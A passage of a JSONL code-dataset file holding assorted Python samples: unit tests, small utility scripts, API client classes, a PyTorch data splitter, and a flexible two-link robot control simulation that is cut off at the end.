+{"seq_id":"597533052","text":"# Test utils functions\nimport time\nimport pytest\nimport sys\nimport os\n\nPACKAGE_PARENT = '../src'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\n\nfrom database.tables import to_json, from_json, make_checksum\nfrom actor.player import Player\n\n# Setup\n\ndef test_json_conversion():\n\n errors = []\n\n jstest = Player()\n \n converted = to_json(jstest, [])\n restored = from_json(converted)\n if type(restored) != type(jstest):\n errors.append(\"Restored object type != Original object type\")\n\n converted = to_json(jstest, [ '_name' ])\n restored = from_json(converted)\n if hasattr(jstest, '_name') != True:\n errors.append(\"Test object is missing required attribute _name - setup failure\")\n if hasattr(restored, '_name') != False:\n errors.append(\"Test failed: Converted object contains field which should be skipped\")\n\n assert errors == []\n\n\ndef test_make_checksum():\n input = 'Some text to checksum'\n testhash = make_checksum(input)\n\n assert testhash == '8ca468e971e74fc26372ab0507ef6796'\n","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636288877","text":"from unittest import TestCase\nfrom unittest.mock import patch, Mock\n\nfrom ..cli import (\n argparser,\n BATCLI,\n NestedNameSpace,\n Commands,\n logging,\n argparse,\n)\n\n\nSRC = 'bat.cli'\n\n\nclass TestArgparser(TestCase):\n\n def test_argparser(t):\n argparser()\n\n\nclass TestBATCLI(TestCase):\n\n def setUp(t):\n patches = ['exit', 'get_config', ]\n for target in patches:\n patcher = patch(f'{SRC}.{target}', autospec=True)\n setattr(t, target, patcher.start())\n t.addCleanup(patcher.stop)\n\n def validate_commands(t, commands):\n for cmd in commands:\n with t.subTest(cmd):\n func = '_'.join(cmd.split())\n with patch(f'{SRC}.Commands.{func}', autospec=True) as m_cmd:\n m_cmd.__name__ = func\n ARGS = cmd.split()\n BATCLI(ARGS)\n args = argparser().parse_args(ARGS)\n t.get_config.assert_called_with(\n cli_args=args,\n config_file=args.config_file,\n config_env=args.config_env,\n )\n m_cmd.assert_called_with(\n t.get_config.return_value\n )\n t.exit.assert_called_with(0)\n\n @patch(f'{SRC}.Commands.set_log_level', autospec=True)\n def test_set_log_level(t, set_log_level):\n args = ['--debug', 'hello', ]\n BATCLI(args)\n set_log_level.assert_called_with(argparser().parse_args(args))\n t.exit.assert_called_with(0)\n\n @patch(f'{SRC}.argparser', wraps=argparser)\n def test_missing_command(t, argparser):\n '''prints help if no arguments are given\n '''\n # first get the actual parsed args\n ARGS = []\n parser = argparser()\n parser.print_help = Mock(wraps=parser.print_help)\n args = parser.parse_args(ARGS)\n\n # calling return_value makes argparser return a mock\n m_parser = argparser.return_value\n # make the return value from the mock the real args object\n m_parser.parse_args.return_value = args\n\n BATCLI(ARGS)\n parser.print_help.assert_called_with()\n\n @patch('builtins.print')\n @patch(f'{SRC}.argparser', wraps=argparser)\n def test_command_error(t, argparser, print):\n '''prints the error message, and help if a command throws an error\n '''\n exc = Exception()\n\n def fail(args):\n raise exc\n\n ARGS = []\n parser = argparser()\n args = parser.parse_args(ARGS)\n args.func = fail\n m_parser = argparser.return_value\n m_parser.parse_args.return_value = args\n\n BATCLI(ARGS)\n print.assert_called_with(exc)\n m_parser.print_help.assert_called_with()\n\n def test_commands(t):\n commands = [\n 'hello',\n 'run_functional_tests',\n 'run_container_tests',\n ]\n\n t.validate_commands(commands)\n\n # TODO: full coverage of CLI arguments that trigger commands\n\n\nclass TestNestedNameSpace(TestCase):\n\n def test_nesting(t):\n nns = NestedNameSpace()\n setattr(nns, 'top', 'level')\n setattr(nns, 'bat.baz', 'baz')\n setattr(nns, 'bat.sub.var', 'sub_var')\n\n t.assertEqual(nns.top, 'level')\n t.assertEqual(nns.bat.baz, 'baz')\n t.assertEqual(nns.bat.sub.var, 'sub_var')\n\n\nclass TestCommands(TestCase):\n\n @patch(f'{SRC}.log', autospec=True)\n def test_set_log_level(t, log):\n with t.subTest('default to ERROR'):\n args = argparse.Namespace(loglevel=logging.INFO)\n Commands.set_log_level(args)\n log.setLevel.assert_called_with(logging.INFO)\n\n with t.subTest('set given value'):\n args = argparse.Namespace(loglevel=logging.INFO)\n Commands.set_log_level(args)\n log.setLevel.assert_called_with(logging.INFO)\n","sub_path":"bat/tests/cli_test.py","file_name":"cli_test.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"380517019","text":"import unittest\nimport vcs\nimport warnings\nwarnings.filterwarnings(\"error\")\n\nclass TestVCSInteract(unittest.TestCase):\n def testInteractNoOpen(self):\n\n x=vcs.init()\n x.drawlogooff()\n #x.interact()\n with self.assertRaises(Exception) as context:\n x.interact()\n\n self.assertTrue('Cannot interact if you did not open the canvas yet' in context.exception)\n","sub_path":"tests/test_vcs_interact_no_open.py","file_name":"test_vcs_interact_no_open.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"462336412","text":"# This is for CS 547, helps calculating GCD\n\nprint(\"How many times do you want to use this program?\")\ntimes = input()\ntimes = int(times)\n\nwhile(times != 0):\n print(\"This is the GCD calculator. Please input your values\\nGCD(a,b)\")\n a = input()\n b = input()\n\n number1 = int(a)\n number2 = int(b)\n\n def gcd(a,b):\n if b == 0:\n return a\n else:\n return gcd(b,a%b)\n\n print(\"The GCD values of \" +a+\" & \"+b+\" is \"+str(gcd(number1,number2)))\n\n times-=1","sub_path":"gcdScriptElucid.py","file_name":"gcdScriptElucid.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"64707388","text":"# -*- coding: utf-8 -*-\n# MIT License\n# Copyright (c) 2020 Arthur\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nfrom datetime import datetime\nfrom typing import List, Dict, Union\n\nfrom .user import UserBase\nfrom ..utils import represents, endpoints, AsyncFetcher\n\n\nclass AuctionTag:\n \"\"\"\n Represents a dblstats tag object.\n\n :param bot: A collection of tags strings that are linked to bot types.\n :param server: A collection of tags strings that are linked to server types.\n \"\"\"\n\n def __init__(self, bot: List[str], server: List[str]):\n self.bot = bot\n self.server = server\n\n def __repr__(self):\n return represents(self)\n\n\nclass AuctionUser(UserBase):\n \"\"\"\n Represents a Top.gg auction user.\n\n :param id: The user their discord id\n :param tag: The user their discord tag (username#discriminator)\n :param avatar: The user their discord avatar url\n :param default_avatar: The user their default discord avatar url (calculated by discriminator)\n :param product: The bot/server name for which the bet is for.\n :param tag: That associated page for the product.\n :param list: The list type for the product, this is either bot or server.\n :param amount: The bet amount in usd.\n :param outbid: If this bet has been outbid.\n :param timestamp: When the bet got submitted.\n :param is_fake: If the bet has been verified as real.\n \"\"\"\n\n def __init__(self, id: str, user_tag: str, avatar: str, default_avatar: str, product: str, tag: str, list: str,\n amount: int, outbid: bool, timestamp: datetime, is_fake: bool):\n super().__init__(id, user_tag, avatar, default_avatar)\n self.product = product\n self.tag = tag\n self.list = list\n self.amount = amount\n self.outbid = outbid\n self.timestamp = timestamp\n self.is_fake = is_fake\n\n def __repr__(self):\n return represents(self)\n\n\nclass AuctionCurrent:\n \"\"\"\n Represents all current betters.\n\n :param bot: A dictionary of which contains a collection of :class AuctionUser: objects which are associated with the tag (as key) in the bot section.\n :param server: A dictionary of which contains a collection of :class AuctionUser: objects which are associated with the tag (as key) in the server section.\n \"\"\"\n\n def __init__(self, bot: Dict[str, List[AuctionUser]], server: Dict[str, List[AuctionUser]]):\n self.bot = bot\n self.server = server\n\n def __repr__(self):\n return represents(self)\n\n\nclass Auctions:\n \"\"\"\n An object that can fetch the current Top.gg auctions\n\n :param 
fetcher: The :class AsyncFetcher: object which fetches the data from the API.\n    \"\"\"\n\n    def __init__(self, fetcher: AsyncFetcher):\n        self.__fetcher = fetcher\n\n    def __repr__(self):\n        return represents(self)\n\n    async def get_tags(self) -> AuctionTag:\n        \"\"\"\n        Fetches the latest tags from the API.\n\n        :return AuctionTag: The latest bot and server tags.\n        \"\"\"\n        tags = await self.__fetcher.get(endpoints.GET_AUCTIONS_TAGS)\n        return AuctionTag(tags[\"bot\"], tags[\"server\"])\n\n    @staticmethod\n    def parse_user_base_obj(data: Dict[str, Union[Dict[str, str], str, bool]]) -> AuctionUser:\n        return AuctionUser(data[\"user\"].get(\"id\"), data[\"user\"].get(\"tag\"), data[\"user\"].get(\"avatar\"),\n                           data[\"user\"].get(\"def_avatar\"), data.get(\"product\"), data.get(\"tag\"),\n                           data.get(\"list\"), data.get(\"amount\"), data.get(\"outbid\"),\n                           datetime.strptime(data.get(\"timestamp\"), \"%Y-%m-%dT%H:%M:%S.%fZ\"),\n                           data.get(\"is_fake\"))\n\n    def parse_auction_users(self, database: Dict[str, List[Dict[str, Union[bool, int, Dict[str, str]]]]]) -> \\\n            Dict[str, List[AuctionUser]]:\n        data = {}\n        for key, collection in database:\n            data[key] = list(map(self.parse_user_base_obj, collection))\n        return data\n\n    async def get_current(self) -> AuctionCurrent:\n        \"\"\"\n        Fetches all current auctions.\n\n        :return AuctionCurrent: The latest auctions.\n        \"\"\"\n        data = await self.__fetcher.get(endpoints.GET_AUCTIONS_CURRENT)\n        return AuctionCurrent(self.parse_auction_users(data[\"bot\"].items()),\n                              self.parse_auction_users(data[\"server\"].items()))\n","sub_path":"dblstats/objects/dblstats_auctions.py","file_name":"dblstats_auctions.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"385338859","text":"#\n\nimport numpy\nimport torch\n\n\nclass Samples:\n @staticmethod\n def sample(categorical, numerical, output, categorical_embeddings, numerical_shape, n_classes, test_partition=0.2, validation_partition=0.2, verbose=False):\n\n # Pytorch Data Preparation\n\n categorical = torch.tensor(categorical, dtype=torch.int64)\n numerical = torch.tensor(numerical, dtype=torch.float)\n output = torch.tensor(output).flatten()\n\n if verbose:\n print(categorical.shape)\n print(numerical.shape)\n print(output.shape)\n\n # Train-Test Split\n\n samples = [int(test_partition * len(output))]\n samples = [len(output) - samples[0]] + samples\n a = numpy.array(numpy.arange(len(output)))\n a_train = numpy.random.choice(a, size=samples[0], replace=False)\n a_test = numpy.setdiff1d(a, a_train)\n\n categorical_data_train, categorical_data_test = categorical[a_train], categorical[a_test]\n numerical_data_train, numerical_data_test = numerical[a_train], numerical[a_test]\n output_data_train, output_data_test = output[a_train], output[a_test]\n\n if verbose:\n print(categorical_data_train.shape, categorical_data_test.shape)\n print(numerical_data_train.shape, numerical_data_test.shape)\n print(output_data_train.shape, output_data_test.shape)\n\n # Train-Validation Split\n\n samples = [int(validation_partition * len(output_data_train))]\n samples = [len(output_data_train) - samples[0]] + samples\n a = numpy.array(numpy.arange(len(output_data_train)))\n a_train = numpy.random.choice(a, size=samples[0], replace=False)\n a_validation = numpy.setdiff1d(a, a_train)\n\n categorical_data_train, categorical_data_validation = categorical_data_train[a_train], categorical_data_train[a_validation]\n numerical_data_train, numerical_data_validation = numerical_data_train[a_train], numerical_data_train[a_validation]\n output_data_train, output_data_validation = output_data_train[a_train], output_data_train[a_validation]\n\n if verbose:\n print(categorical_data_train.shape, categorical_data_validation.shape, categorical_data_test.shape)\n print(numerical_data_train.shape, numerical_data_validation.shape, numerical_data_test.shape)\n print(output_data_train.shape, output_data_validation.shape, output_data_test.shape)\n\n train = DataFormats(categorical_data_train, numerical_data_train, output_data_train)\n validation = DataFormats(categorical_data_validation, numerical_data_validation, output_data_validation)\n test = DataFormats(categorical_data_test, numerical_data_test, output_data_test)\n\n return train, validation, test, categorical_embeddings, numerical_shape, n_classes\n\n\nclass DataFormats:\n def __init__(self, categorical=None, numerical=None, output=None, categorical_embeddings=None, n_classes=None):\n self.categorical = categorical\n self.numerical = numerical\n self.output = output\n self.categorical_embeddings = categorical_embeddings\n self.n_classes = n_classes\n\n @property\n def numerical_shape(self):\n return self.numerical.shape[1]\n\n def gain_all(self):\n return {'categorical': self.categorical, 'numerical': self.numerical, 'output': self.output, 'categorical_embeddings': self.categorical_embeddings, 'numerical_shape': self.numerical_shape, 'n_classes': self.n_classes}\n\n\nclass DataRoles:\n def __init__(self, train=None, validation=None, test=None, categorical_embeddings=None, numerical_shape=None, n_classes=None, non_sampled=None):\n\n if non_sampled is None:\n self.train = train\n self.validation = validation\n self.test = test\n self.categorical_embeddings = 
categorical_embeddings\n self.numerical_shape = numerical_shape\n self.n_classes = n_classes\n else:\n self.train, self.validation, self.test, self.categorical_embeddings, self.numerical_shape, self.n_classes = Samples.sample(**non_sampled.gain_all())\n\n\nclass Conductor:\n def __init__(self, data_frame, target, embedding_strategy='default', embedding_explicit=None):\n self.data_frame = data_frame\n self._data = None\n if isinstance(target, list):\n self.target = target\n else:\n self.target = [target]\n self._embedding_strategy = embedding_strategy\n self._embedding_explicit = embedding_explicit\n\n @property\n def data(self):\n if self._data is None:\n self.data_cast()\n return self._data\n\n def data_cast(self):\n data = DataFormats()\n data.categorical = numpy.stack([self.data_frame[col].cat.codes.values for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'category') and (col not in self.target)], axis=1)\n data.numerical = numpy.stack([self.data_frame[col].values for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'float64') and (col not in self.target)], axis=1)\n data.output = self.data_frame[self.target].values\n if self._embedding_strategy == 'default':\n data.categorical_embeddings = [(len(self.data_frame[col].cat.categories), min(50, (len(self.data_frame[col].cat.categories) + 1) // 2)) for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'category') and (col not in self.target)]\n elif self._embedding_strategy is None:\n data.categorical_embeddings = None\n else:\n data.categorical_embeddings = self._embedding_explicit\n if self.data_frame[self.target[0]].dtype.name == 'category':\n data.n_classes = self.data_frame[self.target[0]].cat.categories.values.shape[0]\n else:\n data.n_classes = None\n self._data = DataRoles(non_sampled=data)\n\n\n","sub_path":"theth_wyrm/holy/data_keeper/keeper.py","file_name":"keeper.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"269922018","text":"from exkaldirt import stream,base\nfrom exkaldirt import feature\nfrom exkaldirt import decode\nimport os\nimport numpy as np\n\nwavPath = \"../examples/84-121550-0000.wav\"\n\nassert os.path.isfile(wavPath), f\"No such file: {wavPath}\"\n\n###########################\n# Acoustic Estimator\n###########################\n\ndef feat_estimator_test():\n\n reader = stream.StreamReader(\n waveFile = wavPath,\n chunkSize = 480,\n simulate = False,\n vaDetector = None,\n )\n\n cutter = stream.ElementFrameCutter(\n width = 400,\n shift = 160,\n )\n \n extractor = feature.MfccExtractor(\n batchSize = 100,\n useEnergy = False,\n )\n\n processor = feature.FeatureProcessor(\n featDim = 13,\n delta = 2,\n spliceLeft = 10,\n spliceRight = 10,\n cmvNormalizer = feature.FrameSlideCMVNormalizer(),\n )\n \n left = 5\n right = 5\n estimator = decode.AcousticEstimator(\n featDim = 819,\n batchSize = 100,\n applySoftmax = False,\n applyLog = False,\n leftContext = left,\n rightContext = right,\n )\n\n estimator.acoustic_function = lambda x:x[left:-right].copy()\n\n reader.start()\n cutter.start(inPIPE=reader.outPIPE)\n extractor.start(inPIPE=cutter.outPIPE)\n processor.start(inPIPE=extractor.outPIPE)\n estimator.start(inPIPE=processor.outPIPE)\n\n estimator.wait()\n print( estimator.outPIPE.size() )\n\nfeat_estimator_test()\n","sub_path":"exkaldirt/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"404149173","text":"import sys\nimport random\nimport json\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt \nmatplotlib.use('TKagg')\n\ninput = np.array([1,1,0.3])\n\n\nax = []\nbx = []\nay = []\nby = [] \n\nwith open('data.json', 'r') as f:\n scatter = json.load(f)\n# print(scatter)\n ax = scatter[\"ax\"]\n ay = scatter[\"ay\"]\n bx = scatter[\"bx\"]\n by = scatter[\"by\"]\n\n\n\n\ndef generate():\n\n ax = []\n ay = []\n bx = []\n by = []\n for i in range(0,50):\n ax.append(random.uniform(-1,1))\n bx.append(random.uniform(-1,1))\n ay.append(random.uniform(-1,1))\n by.append(random.uniform(-1,1))\n\n with open('data.json','w') as f:\n data = {\n \"ax\": ax,\n \"ay\": ay,\n \"bx\": bx,\n \"by\": by\n }\n json.dump(data,f)\n\ndef calculate():\n accuracy = 0\n for i in range(0,50):\n wtx = np.dot(input,np.array([ax[i],ay[i],1]))\n print(ax[i],ay[i],wtx)\n if(wtx>0):\n accuracy+=1\n\n\n for i in range(0,50):\n wtx = np.dot(input,np.array([bx[i],by[i],1]))\n print(bx[i],by[i],wtx)\n if(wtx<0):\n accuracy+=1\n\n print(accuracy)\n\n\ndef plot():\n plt.scatter(ax,ay,marker='o')\n plt.scatter(bx,by,marker='x')\n x = np.linspace(-1, 1, 100)\n plt.plot(x, -x, linestyle='--', color='blue')\n # plt.plot(x, -x, linestyle='--', color='green')\n # plt.plot(x-x, -x, linestyle='--', color='yellow')\n plt.plot(x, x+5, linestyle='--', color='green')\n plt.plot(x,-x-0.3, linestyle='--', color='red')\n plt.show()\n\ndef main():\n # generate()\n # calculate()\n plot()\n\nif __name__ == '__main__' : \n\n main()\n\n \n","sub_path":"HW_2/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640884266","text":"from app.adapter import PokemonsRequest\nfrom app.settings import URL_POKE_API\nimport json\n\nclass PokemonRest():\n def __init__(self):\n self.data = PokemonsRequest()\n\n def get_all_pokemons(self):\n response = self.data.request_data(url=URL_POKE_API)\n pokelist = self.__next_pokemons(response)\n return pokelist\n\n def get_pokemon_by_id(self, identification_number):\n pokemon = self.data.request_data_by_id(identification_number=identification_number)\n return pokemon\n\n def get_pokemon_by_name(self, name, offset=20, limit=0, sort='asc'):\n response = self.data.request_data(url=URL_POKE_API)\n pokelist = self.__next_pokemons(response)\n match = self.__attach_pokemon_by_name(pokelist, sort, name=name)\n return match\n\n def __next_pokemons(self, response):\n pokelist = []\n for x in response[\"results\"]:\n pokelist.append(x)\n all_pokemons = response.get(\"count\")\n while len(pokelist) != all_pokemons:\n url = response.get(\"next\")\n if url is not None:\n response = self.data.request_data(url=url)\n else:\n response = self.data.request_data(url=URL_POKE_API, offset=len(pokelist))\n for x in response[\"results\"]:\n pokelist.append(x)\n\n return pokelist\n\n def __attach_pokemon_by_name(self, pokelist, sort, name):\n attach = []\n sort = False\n for i in range(len(pokelist)):\n pokemon_name = pokelist[i].get('name')\n if name in pokemon_name:\n attach.append(pokelist[i])\n print(attach)\n if sort == \"desc\":\n sort = True\n result = sorted(attach, key=lambda x: x['name'], reverse=sort)\n return result\n","sub_path":"app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"460126853","text":"\"\"\"\n#------------------------------------------------------------------------------\n# Create ZV-IC Shaper\n#\n# This script will take a generalized input from an undamped second order system subject \n# to nonzero initial conditions and solve the minimum-time ZV shaper using optimization\n#\n# Created: 6/20/17 - Daniel Newman -- dmn3669@louisiana.edu\n#\n# Modified:\n# * 6/20/17 - DMN -- dmn3669@louisiana.edu\n#\t\t\t- Added documentation for this script\n#------------------------------------------------------------------------------\n\"\"\"\n\n# Ignore user warnings to keep the terminal clean\nimport warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\nwarnings.simplefilter(\"ignore\", RuntimeWarning)\n\n# Import the necessary python library modules\nimport numpy as np\nfrom scipy.signal import lsim\nfrom scipy.special import gamma\nfrom scipy import integrate\nimport control\nfrom scipy import optimize\nimport os\nimport sys\nimport pdb\n\n# Add my local path to the relevant modules list\nsys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')\n\n# Import my python modules\nimport InputShaping as shaping\nimport Generate_Plots as genplt\nimport kanes_2link as twolink\n\nfolder = 'Figures/{}/'.format(\n\t\t\t\t\t\t\t\t\t\t\t\tsys.argv[0],\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\n# Number of elements per link\nn = 3\n\n# Time array\ntmax = 15\nt_step = 0.01\nt = np.arange(0,tmax,t_step)\nStartTime = 0.0\n\n# Conversion for degrees to radians\nDEG_TO_RAD = np.pi / 180\n\n# Link Length\nL_1 = 0.5\nL_2 = 0.5\nL = [L_1,L_2]\n\n# Mass density per unity length\nrho = 0.2\n\n# Mass of the links\nm_1 = rho * L_1\nm_2 = rho * L_2\nM = [m_1,m_2]\n\n# Mass of the link payloads\nm_p = np.arange(0.0,1.0,0.1)\nm_h2 = 1\n\nJ_h1 = 0.1\nJ_h2 = 0.1\nJ_p = 0.0005\nJ = [J_h1,J_h2,J_p]\n\n# Initial states\ntheta1_0 = 0\ntheta1_dot_0 = 0\ntheta2_0 = 0\ntheta2_dot_0 = 0\nX0 = [np.rad2deg(theta1_0),np.rad2deg(theta2_0),theta1_dot_0,theta2_dot_0]\n\n# Stiffness of the links\nE = 1\nI = 1\n\n# Maximum allowed actuator effort\ntau_max = 10\n\ntheta1_d = 90. * DEG_TO_RAD\ntheta2_d = 90. 
* DEG_TO_RAD\nDistance = [theta1_d,theta2_d]\nDisturb_Dist = [0.001,0.001]\n\n# Arguments to pass to the solver\np = [tau_max, M, J, I, E, L, StartTime, t_step, t, X0, Distance]\np_disturb = [tau_max, M, J, I, E, L, StartTime, t_step, t, X0, Disturb_Dist]\n\nKane_nom = twolink.derive_sys(n,[[0.1,m_h2],J, E, I])\n\nQ = np.diagflat([0.9486, 0.2993, 0.0744, 0.0010, 0.2299, 1.8036, 0.0240, 4.4930, 0.0010, 0.0034, 0.0010, 2.7230]) \nR = np.diagflat([0.5574, 0.0742])\n\nA,B = twolink.linearize_system(n,Kane_nom,p)\n\nQ_LQR = np.diagflat([0.0010, 0.0010, 0.0010, 1.3499, 0.0644, 2.7491, 0.0184, 4.5188, 0.5126, 0.0722, 0.1133, 1.0610 ]) \nR_LQR = np.diagflat([1.0818, 0.1238])\n\nLQR_Gains,S,Eigs = control.lqr(A,B,Q_LQR,R_LQR)\nLQR_Gains = LQR_Gains.T\nK_damped,S,Eigs = control.lqr(A,B,Q,R)\n\nK_damped = K_damped.T\nK_damped[1,:] = 0\nK_damped[2*n-2,:] = 0\nK_damped[3*n-2,:] = 0\nK_damped[4*n-2,:] = 0.\n\n\nLQR_Gains[1,:] = 0\nLQR_Gains[2*n-2,:] = 0\nLQR_Gains[3*n-2,:] = 0\nLQR_Gains[4*n-2,:] = 0.\n\nOmegas_damp,Zetas_damp = twolink.nominal_omega(n,Kane_nom,p,K_damped)\nLQR_Omegas,LQR_Zetas = twolink.nominal_omega(n,Kane_nom,p,LQR_Gains)\n\ndes_xy = np.zeros([1,4*n])\n\ndes_xy[:,0:n] = np.tile(theta1_d,(n,1)).T\ndes_xy[:,n:2*n] = np.tile(theta2_d,(n,1)).T\n\ndes_x,des_y = twolink.get_xy_coords(n,des_xy,L)\n\ndef settling_time(response):\n X,Y = twolink.get_xy_coords(n,response,L)\n less = np.where(\n np.sqrt((X[:,-1] - des_x[0,-1]) / des_x[0,-1] \\\n + (Y[:,-1] - des_y[0,-1])**2) > 0.05 )\n\n t_settle = t[np.amax(less)]\n return t_settle\n\nlqr_settle = np.zeros(len(m_p))\nshaped_settle = np.zeros(len(m_p))\n'''\nfor i in range(len(m_p)):\n\n payload_mass = float(m_p[i])\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[payload_mass,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(m_p / 0.1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_mp',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n\n\nJ_h1 = 0.1\nJ_h2 = np.arange(0,1,0.1)\nJ_p = 0.0005\n\nfor i in range(len(J_h2)):\n\n hub2_inertia = float(J_h2[i])\n J = [J_h1,hub2_inertia,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[0.1,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(J_h2 / 0.1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_Jh2',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n\n\nJ_h1 = np.arange(0,1,0.1)\nJ_h2 = 0.1\nJ_p = 0.0005\nm_p = 1\n\nfor i in range(len(J_h1)):\n\n hub1_inertia = 
float(J_h1[i])\n J = [hub1_inertia,J_h2,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[m_p,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(J_h1 / 0.1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n name_append='Settle_Time_Jh1',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n folder=folder,grid=False,save_data=False,ncol=2,legend_loc='top',ymax=0.1,\n )\n'''\nE = np.arange(0.1,1,0.01)\n\nJ_h1 = 0.1\nJ_h2 = 0.1\nJ_p = 0.0005\nm_p = 1\n\nlqr_settle = np.zeros(len(E))\nshaped_settle = np.zeros(len(E))\nsubopt_settle = np.zeros(len(E))\n\nfor i in range(len(E)):\n\n stiffness = E[i]\n J = [J_h1,J_h2,J_p]\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[m_p,m_h2],J, stiffness, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n subopt_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n subopt_settle[i] = settling_time(subopt_response)\n\n print('LQR Settle: {}'.format(lqr_settle[i]))\n print('Shaped Settle: {}'.format(shaped_settle[i]))\n print('Shaped Sub Settle: {}'.format(subopt_settle[i]))\n\ngenplt.compare_responses(E / 1,\n lqr_settle,'LQR',\n shaped_settle,'Shaped',\n subopt_settle,'Subopt',\n name_append='Settle_Time_E1',\n xlabel='Payload Mass',ylabel='Settling Time (s)',\n 